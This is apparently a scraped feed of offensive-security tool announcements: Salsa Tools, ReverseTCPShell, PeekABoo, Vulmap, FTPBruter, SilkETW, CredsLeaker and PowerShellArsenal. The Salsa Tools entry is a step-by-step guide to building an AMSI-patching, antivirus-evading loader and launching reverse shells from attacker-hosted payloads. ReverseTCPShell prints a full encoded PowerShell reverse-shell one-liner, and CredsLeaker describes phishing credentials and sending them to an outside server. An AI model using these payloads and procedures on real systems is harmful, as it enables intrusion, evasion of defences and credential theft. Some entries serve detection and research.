Salsa Tools – ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched

Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for it’s execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk “Inmersión en la explotación tiene rima” which took place during h-c0n in 9th February 2019.Features* TCP/UDP/ICMP/DNS/BIND/SSL * AV Safe (17th February)* AMSI patchers* PowerShell execution * …OverviewSalsa-Tools is made from three different ingredients: – EvilSalsa – EncrypterAssembly – SalseoLoader And his behavior is as it follows:SetupRequirementsVisual Studio 2017 (or similar)Python 2.7Running la SalsaCooking EvilSalsa ___ __ __ ____ _ / _] | || || | / [_| | | | | | | | _] | | | | | |___ | [_| : | | | | | | |\ / | | | | |_____| \_/ |____||_____| _____ ____ _ _____ ____ / ___/ / || | / ___/ / |( \_ | o || | ( \_ | o | \__ || || |___\__ || | / \ || _ || / \ || _ | \ || | || \ || | | \___||__|__||_____|\___||__|__| [+] That is our Payload EvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as it follows: as soon as the payloads starts, it runs System.Management.Automation.dll which creates a runspace . Within that runspace we have four types of shells (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, first thing first, the existence of c:\windows\system32\amsi.dll is checked. If it exists, it is patched using a home-cooked variant of CyberArk and Rastamouse bypasses.Mixing EncrypterAssembly and Evilsalsa ______ _ | ____| | | | |__ _ __ ___ _ __ _ _ _ __ | |_ ___ _ __ | __| | ‘_ \ / __| ‘__| | | | ‘_ \| __/ _ \ ‘__| | |____| | | | (__| | | |_| | |_) | || __/ | |______|_| |_|\___|_| \__, | .__/ \__\___|_| /\ __/ | || | | | / \ ___ ___ ___ _|___/|_|| |__ | |_ _ / /\ \ / __/ __|/ _ \ ‘_ ` _ \| ‘_ \| | | | | / ____ \\__ \__ \ __/ | | | | | |_) | | |_| | /_/ \_\___/___/\___|_| |_| |_|_.__/|_|\__, | __/ | |___/ [+] Software that encrypts the payload using RC4 [+] We have the version in python and the version in .exeEncrypterAssembly can be used as a Python script or as a Exe binary. It encrypts the previously generated EvilSalsa.Python usage:python encrypterassembly.py <PASSWORD> <OUTPUT>Executable usage:Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>Bringing the Encrypted EvilSalsa to the table with SalseoLoaderSalseoLoader is in charge of loading the encrypted payload. Can be both compiled as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run. If it is compiled as a library, the descriptor “main" must be exported. Arguments are added using environmental variables. _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____| | / \ / || \ / _]| \| | | || o || \ / [_ | D )| |___ | O || || D || _]| /| || || _ || || [_ | \| || || | || || || . \|_____| \___/ |__|__||_____||_____||__|\_| By: CyberVaca@HackPlayers[+] Usage: [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt R everseICMP LHOST [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode[+] Shells availables: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCPTutorialCompiling the binariesDownload the source code from the github and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).You can select the architecture inside Visual Studio in the left "Build" Tab in "Platform Target".(If you can’t find this options press in "Project Tab" and then in " Properties")Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):Prepare the BackdoorFirst of all, you will need to encode the EvilSalsa.dll. To do so, you can use the python script encrypterassembly.py or you can compile the project EncrypterAssemblyPythonpython EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txtWindowsEncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txtOk, now you have everything you need to execute all the Salseo thing: the encoded EvilDalsa.dll and the binary of SalseoLoader. Upload the SalseoLoader.exe binary to the machine. It shouldn’t be detected by any AV…Execute the backdoorGetting a TCP reverse shell (downloading encoded dll through HTTP)Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>Getting a UDP reverse shell (downloading encoded dll through SMB)Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>Getting a TCP reverse shell SSL (using local file)Set the listener inside the attacker machine:openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesopenssl s_server -key key.pem -cert cert.pem -port <port> -tls1Execute the backdoor:SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>Getting a ICMP reverse shell (encoded dll already inside the victim)This time you need a special tool in the client to receive the reverse shell. Download: [https://github.com/inquisb/icmpsh]Disable ICMP Replies: #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 Execute the client:python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"Inside the victim, lets execute the salseo thing:SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>Compiling SalseoLoader as DLL exporting main functionOpen the SalseoLoader project using Visual Studio.Add before the main function: [DllExport]Before the main function add this line: [DllExport]Install DllExport for this projectTools –> NuGet Package Manager –> Manage NuGet Packages for Solution…Search for DllExport package (using Browse tab), and press Install (and accept the popup)In your project folder have appeared the files: DllExport.bat and DllExport_Configure.batUninstall DllExportPress Uninstall (yeah, its weird but trust me, it is necessary)Exit Visual Studio and execute DllExport_configureJust exit Visual StudioThen, go to your SalseoLoader folder and execute DllExport_Configure.bat Select x64 (if you are going to use it inside a x64 box, that was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press ApplyOpen the project again with visual Studio[DllExport] should not be longer marked as errorBuild the solutionSelect Output Type = Class Library (Project –> SalseoLoader Properties –> Application –> Output type = Class Library)Select x64 platform (Project –> SalseoLoader Properties –> Build –> Platform target = x64)To build the solution: Build –> Build Solution (Inside the Output console the path of the new DLL will appear)Test the generated DllCopy and paste the Dll where you want to test it.Execute:rundll32.exe SalseoLoader.dll,mainIf not error appears, probably you have a functional dll!!Get a shell using the DllDon’t forget to use a HTTP server and set a nc listenerPowershell#You finish, you can enable it again running:sysctl -w net.ipv4.icmp_echo_ignore_all=0CMD$env:pass="password"$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"$env:lhost="10.2.0.5"$env:lport="1337"$env:shell="reversetcp"rundll32.exe SalseoLoader.dll,mainDocumented by https://github.com/carlospolop-forks/Download Salsa-tools

Link: http://feedproxy.google.com/~r/PentestTools/~3/Xgz-WkNK1wE/salsa-tools-shellreverse.html

ReverseTCPShell – PowerShell ReverseTCP Shell, Client & Server

Reverse Encrypted (AES 256-bit) Shell over TCP – using PowerShell SecureString.Attacker (C2-Server Listener):PS> .\ReverseTCP.ps1Target (Client):CMD> ECHO IEX([string]([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String({JABCAGEAcwBlADYANAA9ACIAOABHAEkAWABKADMAKwBBAE0AYgAzADIASgBXAEIAZgAyADkAdQBkAGoAcgBqAHYAeQBkAHUALwB4AFgARgBFAHUAYgB0AHQAVABhAHYAWAAwAGEAbwA9ACIAOwAkAEsAZQB5AD0AKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgBhAHMAZQA2ADQAKQApADsAJABDAGwAaQBlAG4AdAA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJwAxADAALgAwAC4AMAAuADEAJwAsADQANAA0ADQAKQA7ACQAUwB0AHIAZQBhAG0APQAkAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAQgB5AHQAZQBzAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABSAGUAYQBkAD0AJABTAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAEIAeQB0AGUAcwAsACAAMAAsACAAJABCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABDAG8AbQBtAGEAbgBkAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkAL gBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB5AHQAZQBzACwAMAAsACAAJABSAGUAYQBkACkAOwAkAEQAZQBDAG8AZABlAD0AJABDAG8AbQBtAGEAbgBkACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQATwB1AHQAUAB1AHQAPQAoAEkARQBYACgAWwBTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwAuAE0AYQByAHMAaABhAGwAXQA6ADoAUAB0AHIAVABvAFMAdAByAGkAbgBnAEEAdQB0AG8AKABbAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzAC4ATQBhAHIAcwBoAGEAbABdADoAOgBTAGUAYwB1AHIAZQBTAHQAcgBpAG4AZwBUAG8AQgBTAFQAUgAoACQARABlAEMAbwBkAGUAKQApACkAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQARQBuAEMAbwBkAGUAPQBDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAAJABPAHUAdABQAHUAdAAgAC0AQQBzAFAAbABhAGkAbgBUAGUAeAB0ACAALQBGAG8AcgBjAGUAIAB8ACAAQwBvAG4AdgBlAHIAdABGAHIAbwBtAC0AUwBlAGMAdQByAGUAUwB0AHIAaQBuAGcAIAAtAEsAZQB5ACAAJABLAGUAeQA7ACQAUwBlAG4AZABCAHkAdABlAD0AKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAG UAdABCAHkAdABlAHMAKAAkAEUAbgBDAG8AZABlACkAOwAkAFMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABTAGUAbgBkAEIAeQB0AGUALAAwACwAJABTAGUAbgBkAEIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABTAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsARQB4AGkAdAA=}))));Exit | PowerShell -PoC:Payload Execution:Analyze Encrypted Traffic:Download ReverseTCPShell

Link: http://feedproxy.google.com/~r/PentestTools/~3/pWymKYDrZz8/reversetcpshell-powershell-reversetcp.html

PeekABoo – Tool To Enable Remote Desktop On The Targeted Machine

PeekABoo tool can be used during internal penetration testing when a user needs to enable Remote Desktop on the targeted machine. It uses PowerShell remoting to perform this task.The tool only works if WinRM is enabled. Since Windows Server 2012 WinRM is enabled by default on all Windows server operating systems, but not on client operating systems.Note: Remote desktop is disabled by default on all Windows operating systems. User would require local administrator password or administrator privileges on the server to enable RDP on a targeted machine.ScreenshotsTargeted machine on an internal network has RDP disabled:Enabling remote desktop service on a targeted machine by pressing option 2:Successfully enabled remote desktop service on a targeted machine:How to install?- git clone https://github.com/Viralmaniar/PeekABoo.git- cd PeekABoo- python peekaboo.pyHow do I use this?Press 1: This will set the PowerShell to unrestricted mode.Press 2: It enables the Remote Desktop on the targeted machine and shows the RDP port (3389) status.Press 3: It disables the Remote Desktop on the targeted machine.Press 4: To exit from the program.My Windows machine does not have Python installed, what should I do? Download an exe from the release section of the Github along with PowerShell files available here or do it on your own using PyInstaller after reviewing the source code. Compile peekaboo.py into an executable using Pyinstaller PyInstaller is available on PyPI. You can install it through pip: pip install pyinstallerQuestions?Twitter: https://twitter.com/maniarviral LinkedIn: https://au.linkedin.com/in/viralmaniarDownload PeekABoo

Link: http://feedproxy.google.com/~r/PentestTools/~3/pKwJLmFuw_Y/peekaboo-tool-to-enable-remote-desktop.html

Vulmap – Online Local Vulnerability Scanners Project

Vulmap is an open source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also they can be used for privilege escalation by pentesters/red teamers.Vulmap can be used to, scan vulnerabilities on localhost, see related exploits and download them. Scripts basically, scan localhost to gather installed software information and ask vulmon.com api if there are any vulnerabilies and exploits related with installed software. If vulnerabilities exist, vulmap give CVE ID, risk score, vulnerability’s detail link, exploit id and exploit title. Exploits can be downloaded with vulmap also.Use below links to get detailed information about vulmap:Vulmap Linux – Python script for Linux systemsVulmap Windows – Powershell script for Windows systemsDownload Vulmap

Link: http://www.kitploit.com/2019/05/vulmap-online-local-vulnerability.html

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in thisRead more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

FTPBruter – A FTP Server Brute Forcing Tool

Brute forcing tool for FTP server. FTPBruter can work in any OS if they have and support Python 3.FeatureBrute force a FTP server with a username or a list of usernames (That’s all).Install and Run on LinuxYou have to install Python 3 first:Install Python 3 on Arch Linux and its distros: sudo pacman -S python3 Install Python 3 on Debian and its distros: sudo apt install python3 git clone https://github.com/GitHackTools/FTPBrutercd FTPBruterpython3 ftpbruter.pyInstall and Run on WindowsDownload and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.Download and run Git setup file from Git-scm.com and choose Use Git from Windows Command Propmt.After that, open PowerShell or Command Propmt and enter these commands:git clone https://github.com/GitHackTools/FTPBrutercd FTPBruterpython3 ftpbruter.pyIf you don’t want to install Git, you can download FTPBruter-master.zip, extract and use it.ScreenshotsContact to coderWebsite: GitHackTools.blogspot.comTwitter: @SecureGFTo-do listsCheck anonymous login.Auto-change proxy with brute force.Download FTPBruter

Link: http://feedproxy.google.com/~r/PentestTools/~3/hudxodR8GrU/ftpbruter-ftp-server-brute-forcing-tool.html

SilkETW – Flexible C# Wrapper For ETW (Event Tracing for Windows)

SilkETW is a flexible C# wrapper for ETW, it is meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications it is primarily a research tool in it’s current state.For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to 3rd party infrastructure such as Elasticsearch.Implementation DetailsLibrariesSilkETW is buit on .Net v4.5 and uses a number of 3rd party libraries, as shown below. Please see LICENSE-3RD-PARTY for further details.ModuleId Version LicenseUrl ——– ——- ———- McMaster.Extensions.CommandLineUtils 2.3.2 https://licenses.nuget.org/Apache-2.0 Microsoft.Diagnostics.Tracing.TraceEvent 2.0.36 https://github.com/Microsoft/perfview/blob/master/LICENSE.TXTNewtonsoft.Json 12.0.1 https://licenses.nuget.org/MIT System.ValueTuple 4.4.0 https://github.com/dotnet/corefx/blob/master/LICENSE.TXT YaraSharp 1.3.1 https://github.com/stellarbear/YaraSharp/blob/master/LICENSECommand Line OptionsCommand line usage is fairly straight forward and user input is validated in the execution prologue. See the image below for further details.JSON Output StructureThe JSON output, prior to serialization, is formatted according to the following C# struct.public struct EventRecordStruct{ public Guid ProviderGuid; public List YaraMatch; public string ProviderName; public string EventName; public TraceEventOpcode Opcode; public string OpcodeName; public DateTime TimeStamp; public int ThreadID; public int ProcessID; public string ProcessName; public int PointerSize; public int EventDataLength; public Hashtable XmlEventData;}Note that, depending on the provider and the event type, you will have variable data in the XmlEventData hash table. Sample JSON output can be seen below for “Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop".{ "ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716", "YaraMatch":[ ], "ProviderName":"Microsoft-Windows-Kernel-Process", "EventName":"ThreadStop/Stop", "Opcode":2, "OpcodeName":"Stop", "TimeStamp":"2019-03-03T17:58:14.2862348+00:00", "ThreadID":11996, "ProcessID":8416, "ProcessName":"", "PointerSize":8, "EventDataLength":76, "XmlEventData":{ "FormattedMessage":"Thread 11,996 (in Process 8,416) stopped. ", "StartAddr":"0x7fffe299a110", "ThreadID":"11,996", "UserStackLimit":"0x3d632000", "StackLimit":"0xfffff38632d39000", "MSec":"560.5709", "TebBase":"0x91c000", "CycleTime":"4,266,270", "ProcessID":"8,416", "PID":"8416", "StackBase":"0xfffff38632d40000", "SubProcessTag":"0", "TID":"11996", "ProviderName":"Microsoft-Windows-Kern el-Process", "PName":"", "UserStackBase":"0x3d640000", "EventName":"ThreadStop/Stop", "Win32StartAddr":"0x7fffe299a110" }}UsageFilter data in PowerShellYou can import JSON output from SilkETW in PowerShell using the following simple function.function Get-SilkData { param($Path) $JSONObject = @() Get-Content $Path | ForEach-Object { $JSONObject += $_ | ConvertFrom-Json } $JSONObject}In the example below we will collect process event data from the Kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command.SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.jsonWith data in hand it is easy to sort, grep and filter for the properties we are interested in.YaraSilkETW includes Yara functionality to filter or tag event data. Again, this has obvious defensive capabilities but it can just as easily be used to augment your ETW research.In this example we will use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike’s execute-assembly.rule Seatbelt_GetTokenInformation{ strings: $s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase $s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase $s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/ $s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase condition: all of ($s*)}We can start collecting .Net ETW data with the following command. The "-yo" option here indicates that we should only write Yara matches to disk!SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.jsonWe can see at runtime that our Yara rule was hit.Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (0x2038), specifically: JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword.ChangelogFor details on version specific changes, please refer to the Changelog.Download SilkETW

Link: http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html

CredsLeaker v3 – Tool to Display A Powershell Credentials Box

This script used to display a powershell credentials box asked the user for credentials.However, That was highly noticeable. Now it’s time to utilize Windows Security popup!As before, The box cannot be closed (only by killing the process) will keeps checking the credentials against the DC. When validated, it will close and leak it to a web server outside.How To:Start a web server.Type your server IP and port in the ps1 script.Execute the batch file.LegalThis software is provided for educational use only (also with redteamers in mind). Don’t use credsleaker without mutual consent. If you engage in any illegal activity the author does not take any responsibility for it. By using this software you agree with these terms.Download CredsLeaker

Link: http://feedproxy.google.com/~r/PentestTools/~3/9y08bFtnHNg/credsleaker-v3-tool-to-display.html

PowerShellArsenal – A PowerShell Module Dedicated To Reverse Engineering

PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code, perform .NET malware analysis, analyze/scrape memory, parse file formats and memory structures, obtain internal system information, etc. PowerShellArsenal is comprised of the following tools:DisassemblyDisassemble native and managed code.Get-CSDisassemblyDisassembles a byte array using the Capstone Engine disassembly framework.Get-ILDisassemblyDisassembles a raw MSIL byte array passed in from a MethodInfo object in a manner similar to that of Ildasm.MalwareAnalysisUseful tools when performing malware analysis.New-FunctionDelegateProvides an executable wrapper for an X86 or X86_64 function.Invoke-LoadLibraryLoads a DLL into the current PowerShell process.New-DllExportFunctionCreates an executable wrapper delegate around an unmanaged, exported function.Get-HostsFileParses a HOSTS file.New-HostsFileEntryReplace or append an entry to a HOSTS file.Remove-HostsFileEntryRemove an entry or series of entries from a HOSTS file.Get-AssemblyStringsOutput all strings from a .NET executable.Get-AssemblyResourcesExtract managed resources from a .NET assemblyRemove-AssemblySuppressIldasmAttributeStrips a SuppressIldasmAttribute attribute from a .NET assembly.Get-AssemblyImplementedMethodsReturns all methods in an assembly that are implemented in MSIL.MemoryToolsInspect and analyze process memoryGet-ProcessStringsOutputs all printable strings from the user-mode memory of a process.Get-VirtualMemoryInfoA wrapper for kernel32!VirtualQueryExGet-ProcessMemoryInfoRetrieve virtual memory information for every unique set of pages in user memory. This function is similar to the !vadump WinDbg command.Get-StructFromMemoryMarshals data from an unmanaged block of memory in an arbitrary process to a newly allocated managed object of the specified type.ParsersParse file formats and in-memory structures.Get-PEAn on-disk and in-memory PE parser and process dumper.Find-ProcessPEsFinds portable executables in memory regardless of whether or not they were loaded in a legitimate fashion.Get-LibSymbolsDisplays symbolic information from Windows LIB files.Get-ObjDumpDisplays information about Windows object (OBJ) files.WindowsInternalsObtain and analyze low-level Windows OS information.Get-NtSystemInformationA utility that calls and parses the output of the ntdll!NtQuerySystemInformation function. This utility can be used to query internal OS information that is typically not made visible to a user.Get-PEBReturns the process environment block (PEB) of a process.Register-ProcessModuleTraceStarts a trace of loaded process modulesGet-ProcessModuleTraceDisplays the process modules that have been loaded since the call to Register-ProcessModuleTraceUnregister-ProcessModuleTraceStops the running process module traceGet-SystemInfoA wrapper for kernel32!GetSystemInfoMiscMiscellaneous helper functionsGet-MemberA proxy function used to extend the built-in Get-Member cmdlet. It adds the ‘-Private’ parameter allowing you to display non-public .NET membersGet-StringsDumps strings from files in both Unicode and Ascii. This cmdlet replicates the functionality of strings.exe from Sysinternals.ConvertTo-StringConverts the bytes of a file to a string that has a 1-to-1 mapping back to the file’s original bytes. ConvertTo-String is useful for performing binary regular expressions.Get-EntropyCalculates the entropy of a file or byte array.LibLibraries required by some of the RE functions.CapstoneThe Capstone disassembly engine C# binding.De4dotA powerful .NET deobfuscation and .NET PE parsing library.PSReflectA module used to easily define in-memory enums, structs, and Win32 functions.Formattersps1xml files used to format the output of various PowerShellArsenal functions.LicenseThe PowerShellArsenal module and all individual scripts are under the BSD 3-Clause license unless explicitly noted otherwise.UsageRefer to the comment-based help in each individual script for detailed usage information.To install this module, drop the entire PowerShellArsenal folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.The default per-user module path is: “$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"To use the module, type Import-Module PowerShellArsenalTo see the commands imported, type Get-Command -Module PowerShellArsenalIf you’re running PowerShell v3 and you want to remove the annoying ‘Do you really want to run scripts downloaded from the Internet’ warning, once you’ve placed PowerShellArsenal into your module path, run the following one-liner: $Env:PSModulePath.Split(‘;’) | % { if ( Test-Path (Join-Path $_ PowerShellArsenal) ) {Get-ChildItem $_ -Recurse | Unblock-File} }For help on each individual command, Get-Help is your friend.Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.Script Style GuideFor all contributors and future contributors to PowerShellArsenal, I ask that you follow this style guide when writing your scripts/modules.Avoid Write-Host at all costs. PowerShell functions/cmdlets are not command-line utilities! Pull requests containing code that uses Write-Host will not be considered. You should output custom objects instead. For more information on creating custom objects, read these articles: http://blogs.technet.com/b/heyscriptingguy/archive/2011/05/19/create-custom-objects-in-your-powershell-script.aspxhttp://technet.microsoft.com/en-us/library/ff730946.aspxIf you want to display relevant debugging information to the screen, use Write-Verbose. The user can always just tack on ‘-Verbose’. Always provide descriptive, comment-based help for every script. Also, be sure to include your name and a BSD 3-Clause license (unless there are extenuating circumstances that prevent the application of the BSD license). Make sure all functions follow the proper PowerShell verb-noun agreement. Use Get-Verb to list the default verbs used by PowerShell. Exceptions to supported verbs will be considered on a case-by-case basis. I prefer that variable names be capitalized and be as descriptive as possible. Provide logical spacing in between your code. Indent your code to make it more readable. If you find yourself repeating code, write a function. Catch all anticipated errors and provide meaningful output. If you have an error that should stop execution of the script, use ‘Throw’. If you have an error that doesn’t need to stop execution, use Write-Error. If you are writing a script that interfaces with the Win32 API, try to avoid compiling C# inline with Add-Type. Try to use the PSReflect module, if possible. Do not use hardcoded paths. A script should be useable right out of the box. No one should have to modify the code unless they want to. PowerShell v2 compatibility is highly desired. Use positional parameters and make parameters mandatory when it makes sense to do so. For example, I’m looking for something like the following: [Parameter(Position = 0, Mandatory = $True)]Don’t use any aliases unless it makes sense for receiving pipeline input. They make code more difficult to read for people who are unfamiliar with a particular alias. Try not to let commands run on for too long. For example, a pipeline is a natural place for a line break. Don’t go overboard with inline comments. Only use them when certain aspects of the code might be confusing to a reader. Rather than using Out-Null to suppress unwanted/irrelevant output, save the unwanted output to $null. Doing so provides a slight performance enhancement. Use default values for your parameters when it makes sense. Ideally, you want a script that will work without requiring any parameters. Explicitly state all required and optional dependencies in the comment-based help for your function. All library dependencies should reside in the ‘Lib’ folder. If a script creates complex custom objects, include a ps1xml file that will properly format the object’s output. ps1xml files are stored in Lib\Formatters. Download PowerShellArsenal

Link: http://www.kitploit.com/2019/04/powershellarsenal-powershell-module.html